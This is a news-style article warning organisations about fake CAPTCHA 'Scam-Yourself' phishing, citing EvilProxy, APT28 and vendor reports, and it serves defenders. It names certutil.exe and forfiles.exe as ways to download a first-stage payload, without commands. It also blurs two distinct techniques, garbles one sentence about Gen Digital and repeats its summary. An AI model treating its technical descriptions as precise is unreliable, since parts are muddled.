Increased prevalence of CAPTCHA deceit in late 2024: Recognizing the signs
In recent months, a new social engineering attack known as "Scam-Yourself" has surged, utilising fake CAPTCHA pages to trick victims into compromising their own credentials. This emerging phishing tactic, which has been gaining traction since Q3 2024, exploits user trust in verification processes and poses significant risks to organisations.
The technique, as reported by security researchers, works by presenting a seemingly legitimate verification step, often disguised as a CAPTCHA, adding an extra layer of deception, making the fraudulent page appear trustworthy enough that the victim willingly provides sensitive information.
One notable example is the EvilProxy phishing kit's use of fake verification pages, including CAPTCHA-style "prove you are not a bot" screens, to lull victims into a false sense of security before redirecting them to fraudulent login pages designed to steal credentials, particularly Microsoft 365 logins.
The potential risks for organisations are numerous. Credential theft and account compromise are at the forefront, as these attacks enable attackers to harvest login credentials that can then be used to breach organisational systems, leading to data leaks, ransomware deployment, or further internal compromise.
Moreover, the use of CAPTCHA or bot verification pages increases the likelihood of victims completing the scam, thereby increasing infection rates in phishing campaigns. This, in turn, presents additional risks, such as supply chain and third-party risks, as seen with the spoofing of platforms like Upwork, which can indirectly jeopardise organisational security if those external parties have network access or sensitive information.
As the attacks grow in volume and complexity, threat actors are expected to leverage AI to create more realistic fake pages and communications, making detection even harder. Attackers may also integrate multi-step deception tactics combining phishing, CAPTCHA-faking, and even voice or video manipulation to further trick targets and bypass multi-factor authentication or security training.
To counteract these threats, organisations are advised to update their security awareness programs and technical defences. Reliaquest has predicted that attackers may also start using alternative execution methods, such as using forfiles.exe or certutil.exe, to download the initial stage of the attack, aiming to circumvent existing detection measures.
In a recent investigation by Ukraine's national cyber defense team, APT28 (Fancy Bear), with ties to the Russian military, was found to have used fake CAPTCHA pages to infiltrate local governments. Meanwhile, a report by Gen Digital protected over 2 million users from the fake CAPTCHA variant of these attacks in the same period.
In summary, the "Scam-Yourself" attack using fake CAPTCHA pages is an emerging, sophisticated phishing tactic that exploits user trust in verification processes to steal credentials. Its rise poses significant risks to organisations through increased credential theft and potential broader compromise, with an ongoing trend of increasing sophistication driven by AI and advanced social engineering techniques. Organisations that do not update their security awareness programs and technical defences may face increased breaches initiated by these "Scam-Yourself" style attacks.
Cybersecurity professionals are warning about the increasing use of fake CAPTCHA pages in phishing attacks, such as the EvilProxy phishing kit, which trick victims into providing sensitive information. This cybersecurity threat, referred to as "Scam-Yourself", poses significant risks to organizations, particularly due to the theft of credentials and potential account compromises.
To counteract these attacks and protect against credential theft and account breaches, organizations must update their security awareness programs and technical defences, as ongoing trends suggest that these attacks may integrate AI, multi-step deception tactics, and alternative execution methods.
